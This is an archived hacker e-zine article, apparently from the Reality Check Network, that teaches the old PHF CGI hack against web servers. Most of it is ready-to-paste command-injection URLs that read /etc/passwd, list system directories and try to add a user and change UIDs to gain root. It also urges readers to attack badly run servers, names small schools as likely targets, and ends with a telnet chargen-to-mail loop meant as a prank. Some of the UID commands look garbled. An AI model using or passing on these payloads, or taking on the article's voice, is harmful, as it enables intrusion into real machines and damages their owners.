TUCoPS :: Networks :: phf.txt

Reality Check Network - PHF Web Hacking

¦       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       ¦_
+----------------------------------------------------------------------------¦_
¦									     ¦	
¦         From Issue #33 - PHF Web Hacking                                   ¦ 
¦         by Dagashi                                                         ¦ 
¦____________________________________________________________________________¦_
¦____________________________________________________________________________¦_
+----------------------------------------------------------------------------¦_
¦                                                                            ¦_
¦      Alright there kiddies, it's time to lightly dive into the world of    ¦_
¦  how to obtain shells that do not rightfully belong to you and how to      ¦_
¦  generally piss off people on the Internet.  As always, this is a well     ¦_
¦  known bit on information (because no one in their right mind would give   ¦_
¦  you an exploit to a system that no one else knows of), so I take no       ¦_
¦  responsibility for whatever you do with it.                               ¦_
¦                                                                            ¦_
¦      Since the majority of computers on the Internet are of UNIX decent,   ¦_
¦  I will be mainly talk about their problems and such.  Now, the majority   ¦_
¦  of us know that UNIX is full of holes and other problems no matter what   ¦_
¦  revisions and patches are made, so this might not come as a big surprise  ¦
¦  when I tell you there is a common exploit that will run any program on    ¦
¦  your victim machine.  It is the PHF hack.  Though it is no big deal to    ¦
¦  the majority of ISP's, most little companies do not have the time or      ¦
¦  money to deal with all the problems of their operating systems.  Small    ¦
¦  schools that are NOT technologically oriented, like high schools with     ¦
¦  T1's and such would be a good example.  And so, this will work on some    ¦
¦  of them.                                                                  ¦
¦                                                                            ¦
¦      All that is required to be done is to put this into the URL of        ¦
¦  Netscape:                                                                 ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd    ¦
¦                                                                            ¦
¦      and you have a listing of the passwd file to use or abuse.  But the   ¦
¦  PHF exploit can do more then just that (for those of you who will be      ¦
¦  flaming me for writing such a simple article).  It can access any type    ¦
¦  of program that is on the opposing computer and run it.                   ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/               ¦
¦                                                                            ¦
¦      will give you the directory listing of everything from the root of    ¦
¦  the system.  From there, you can just alter it accordingly to have a      ¦
¦  peek around the system to see what else you can learn.                    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin            ¦
¦                                                                            ¦
¦      would show you every command that is available in the bin dir.  If    ¦
¦  you slightly modified it, you would also be able to see the permissions   ¦
¦  of the specific files.                                                    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin      ¦
¦                                                                            ¦
¦      which can come in handy since, well, seeing as how you have root      ¦
¦  permissions you now have a nice little bit of information about how the   ¦
¦  system functions can use that to get even more access or information out  ¦
¦  of it.                                                                    ¦
¦                                                                            ¦
¦      Or the best one of them all:                                          ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi    ¦
¦  %20dagashi%20100%20                                                       ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500     ¦
¦                                                                            ¦
¦      Do that and you MIGHT have root access to the server by telnet.  Be   ¦
¦  forewarned that this is an old hack and many servers would not have the   ¦
¦  PHF script still running or have chmoded it to 000.  This can get you     ¦
¦  into a bunch of trouble, so be careful.  As I said before, this is well   ¦
¦  known and I wouldn't give it out to you unless most system                ¦
¦  administrators (if they deserve the title then they know this hack by     ¦
¦  heart) knew it as well.  But there are always those that don't deserve    ¦
¦  the honor of the name, and to those, you have my full consent to fuck up  ¦
¦  their machines to hell.                                                   ¦
¦                                                                            ¦
¦      For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1  ¦
¦  25" in Linux and watch life become a ball.                                ¦
¦                                                                            ¦
+----------------------------------------------------------------------------+

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH